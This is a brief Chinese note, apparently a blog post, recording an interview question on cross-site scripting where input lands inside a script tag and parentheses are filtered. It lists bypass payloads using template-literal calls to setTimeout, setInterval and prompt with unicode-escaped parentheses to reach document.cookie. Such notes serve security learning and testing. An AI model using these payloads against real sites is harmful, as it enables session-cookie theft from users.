別人的一個安全面試題,簡單記錄一下。
參數name直接已經放在了<script>標簽里面:
那么直接alert(document.cookie)試一下:
可以看到括號已經做了處理,雖然可以使用反引號繞過括號過濾,但是反引號中的內容是處理字符串,並不能得到想要的結果,比如:
通過FUZZ,如下:
TIPS:
setTimeout`alert\u0028document.cookie\u0029`;
setInterval`alert\u0028document.cookie\u0029`;
如果setTimeou可以,那么setInterval也可以使用,區別就是后者會根據設置的時間不斷執行:
Tips:
prompt`${document.cookie}`
當然還有其他方法,僅作為tips參考。